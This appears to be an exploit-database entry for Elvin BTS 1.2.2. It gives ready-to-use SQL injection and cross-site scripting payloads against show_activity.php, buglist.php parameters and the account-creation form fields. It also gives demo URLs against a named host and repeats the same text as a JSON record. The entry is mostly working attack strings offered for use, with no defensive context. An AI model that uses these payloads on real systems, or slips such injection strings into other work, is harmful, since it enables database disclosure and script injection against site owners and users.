Search...

Elvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities

2009-08-03T00:00:00

ID 1337DAY-ID-5604
Type zdt
Reporter 599eme Man
Modified 2009-08-03T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =========================================================
Elvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities
=========================================================


# [+] Elvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities
# [+] Software : Elvin BTS
# [+] Author : 599eme Man
# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...
# [+] Special : Moudi my Brozazaaaaaaaaaaaa
#
#[------------------------------------------------------------------------------------]
# 
# [+] Vulnerabilities
#
#	[+] SQL
#
#		- http://www.site.com/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--
#		
#			[+] Demo
#
#				- http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--
#
#	[+] XSS
#
#		- http://www.site.com/buglist.php?component=[XSS/IFRAME/REDIRECTION]
#
#		- http://www.site.com/buglist.php?priority=[XSS/IFRAME/REDIRECTION]
#
#		- http://www.site.com/createaccount.php =&gt; Username : "'&gt;&lt;script&gt;alert('xss')&lt;/script&gt;
# 							=&gt; E-mail : "'&gt;&lt;script&gt;alert('xss')&lt;/script&gt;
# 							=&gt; Pass : "'&gt;&lt;script&gt;alert('xss')&lt;/script&gt;
# 							=&gt; Confirm pass : "'&gt;&lt;script&gt;alert('xss')&lt;/script&gt;
#
#			[+] Demo
#
#				- http://landfill.elvinbts.org/buglist.php?component=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
# 				- http://landfill.elvinbts.org/buglist.php?priority=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E
#
#				- http://landfill.elvinbts.org/createaccount.php
#
#
#
#[------------------------------------------------------------------------------------]
#
#########################################################################################################




#  0day.today [2018-02-16]  #

JSON Vulners Source

Initial Source

{"published": "2009-08-03T00:00:00", "id": "1337DAY-ID-5604", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.4, "vector": "NONE", "modified": "2018-02-16T03:14:18", "rev": 2}, "dependencies": {"references": [], "modified": "2018-02-16T03:14:18", "rev": 2}, "vulnersScore": 0.4}, "type": "zdt", "lastseen": "2018-02-16T03:14:18", "edition": 2, "title": "Elvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities", "href": "https://0day.today/exploit/description/5604", "modified": "2009-08-03T00:00:00", "bulletinFamily": "exploit", "viewCount": 51, "cvelist": [], "sourceHref": "https://0day.today/exploit/5604", "references": [], "reporter": "599eme Man", "sourceData": "=========================================================\r\nElvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities\r\n=========================================================\r\n\r\n\r\n# [+] Elvin BTS 1.2.2 (SQL/XSS) Multiple Remote Vulnerabilities\r\n# [+] Software : Elvin BTS\r\n# [+] Author : 599eme Man\r\n# [+] Thanks : Moudi, Neocoderz, Sheiry, Shimik Root aka Str0zen, Pr0H4ck3rz, Staker, Security-shell...\r\n# [+] Special : Moudi my Brozazaaaaaaaaaaaa\r\n#\r\n#[------------------------------------------------------------------------------------]\r\n# \r\n# [+] Vulnerabilities\r\n#\r\n#\t[+] SQL\r\n#\r\n#\t\t- http://www.site.com/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--\r\n#\t\t\r\n#\t\t\t[+] Demo\r\n#\r\n#\t\t\t\t- http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--\r\n#\r\n#\t[+] XSS\r\n#\r\n#\t\t- http://www.site.com/buglist.php?component=[XSS/IFRAME/REDIRECTION]\r\n#\r\n#\t\t- http://www.site.com/buglist.php?priority=[XSS/IFRAME/REDIRECTION]\r\n#\r\n#\t\t- http://www.site.com/createaccount.php => Username : \"'><script>alert('xss')</script>\r\n# \t\t\t\t\t\t\t=> E-mail : \"'><script>alert('xss')</script>\r\n# \t\t\t\t\t\t\t=> Pass : \"'><script>alert('xss')</script>\r\n# \t\t\t\t\t\t\t=> Confirm pass : \"'><script>alert('xss')</script>\r\n#\r\n#\t\t\t[+] Demo\r\n#\r\n#\t\t\t\t- http://landfill.elvinbts.org/buglist.php?component=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E\r\n#\r\n# \t\t\t\t- http://landfill.elvinbts.org/buglist.php?priority=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E\r\n#\r\n#\t\t\t\t- http://landfill.elvinbts.org/createaccount.php\r\n#\r\n#\r\n#\r\n#[------------------------------------------------------------------------------------]\r\n#\r\n#########################################################################################################\r\n\r\n\r\n\r\n\n# 0day.today [2018-02-16] #"}